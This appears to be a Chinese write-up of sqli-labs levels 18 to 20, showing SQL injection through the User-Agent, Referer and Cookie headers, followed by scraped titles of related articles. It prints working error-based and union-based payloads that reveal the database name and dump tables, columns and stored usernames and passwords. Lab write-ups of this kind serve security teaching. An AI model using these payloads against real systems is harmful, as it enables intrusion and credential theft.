sqli-lab————Writeup(18~20)各种头部注入
less18 基于错误的用户代理,头部POST注入
admin
admin
登入成功(进不去重置数据库)
显示如下
有user agent参数,可能存在注入点
显示版本号:
爆库:User-Agent:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
库名:
less19基于头部的RefererPOST报错注入
抓包
admin登陆什么也没有
在referer后加单引号有回显sql语法错误
然后就和 18一样了:Referer: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
爆库:
less20 基于错误的cookie头部POST注入
admin登陆:
本关登录成功后用户名会存储在cookie中,且通过该参数执行SQL语句
登录成功之后会设置里面的cookie 当二次刷新的时候 这时候会重新从里面取值弄,并且这次取值没有经过过滤 直接就是注入点 还是使用updatexml的函数进行报错
方法一:
cookie注入:uname=admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #
方法2:
cookie 后加单引号出现报错,说明cookie处存在注入点
'order by 3 --+ // 回显正常
'order by 4 --+ // 回显错误//说明行数有3个,即3个显示位
爆库名:
之后就是爆表:
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆字段:
union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
爆值:
union select 1,2,group_concat(username,0x3a,password) from users--+
sqli-lab————Writeup(18~20)各种头部注入相关推荐
- 网络安全——HTTP头部注入
一.HTTP头部注入概述 1.HTTP工作原理 2.HTTP报文类型 (1).请求报文 (2).响应报文 3.HTTP头部内容 referer主要用来统计页面访问次数 二.HTTP头部注入 1.原理: ...
- Fedora 15 16 17 18 20无线网卡驱动安装
Fedora 15 16 17 18 20无线网卡驱动安装 一直不想在虚拟机中安装使用系统,然后就打算给自己的电脑安装一个双系统,因对Fedora有比较好的印象,也就还是选用了它作为我的第二系统.废话 ...
- SOL注入——HTTP头部注入(2)(七)
本章目的 普及HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义和作用,掌握HTTP头部注入的原理.方法及基本流程. HTTPHeader概述 ...
- SOL注入——HTTP头部注入(六)
本章目的 普及HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义和作用,掌握HTTP头部注入的原理.方法及基本流程. HTTPHeader概述 ...
- 2016年10月9日 星期日 --出埃及记 Exodus 18:20
2016年10月9日 星期日 --出埃及记 Exodus 18:20 Teach them the decrees and laws, and show them the way to live an ...
- SQL注入--HTTP头部注入
实验目的 理解HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理.方法及基本流程. 实验原理 有时候,后台开 ...
- SQL注入-HTTP头部注入
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-11.访问的URL为: http://[靶机IP ...
- host头部注入漏洞--中危
host头部注入漏洞--中危 漏洞原理 漏洞知识扩展 漏洞验证 情况一 情况二 修复方案 漏洞原理 为了方便获取网站域名,开发人员一般依赖于请求包中的Host首部字段.例如,在php里用_SERVER ...
- SQL注入——HTTP头部注入
实验目的 理解HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理.方法及基本流程. 实验原理 有时候,后台开 ...
最新文章
- 轻轻的我走了,正如我轻轻的来…——ADO.NET核心类的灭度与SQLHelper的诞生——十八相送(下)...
- 微服务架构下分布式事务解决方案 —— 阿里GTS
- C语言学习:snprintf()函数
- 介绍一份数据分析报告
- SilverLight:布局(3)StackPanel 对象
- [导入]jbuilder 2006开发struts+sqlserver2K准备工作
- java调用python脚本并向python脚本传递参数
- java integer集合排序_Java集合中List的Sort()方法进行排序
- git使用kdiff3合并乱码问题
- iphone自动下载当天VOA
- 下载书籍的网址【汇总】
- PR连接蓝牙后无声音
- Mobaxterm 中文输入Backspace按键问题
- C14:Unity3D制作智能家居设计软件——双屏互动室内漫游
- php开发公众号素材管理总结
- 写一个块linux设备驱动
- java移动小球_使用java实现持续移动的小球
- 计算机键盘时好时坏,机子的CTRL键时好时坏?
- 基于FPGA的MPPT系统开发
- Pubwin 2007有奖“找茬”计划
热门文章
- git设置mergetool可视化工具
- Elasticsearch7.15.2 出现 node validation exception 的问题处理
- Vue项目npm打包推荐方式
- linux CentOS7 最小化安装环境静默安装Oracle11GR2数据库(安装操作系统环境_01)
- form表单提交,后台实体类接收转义问题 解决方案
- MyBatis-Plus_通用service
- 查看linux系统版本信息(Oracle Linux、Centos Linux、Redhat Linux、Debian、Ubuntu)
- go 根据输入类型执行对应的方法_安全很重要:Go项目的安全评估技术
- ensp安装对电脑配置要求高吗_直线导轨有哪些安装方法?为什么直线导轨安装精度要求高?...
- eclipse html页面校验,当我在Eclipse浏览器中运行url时,HTML表单未通过验证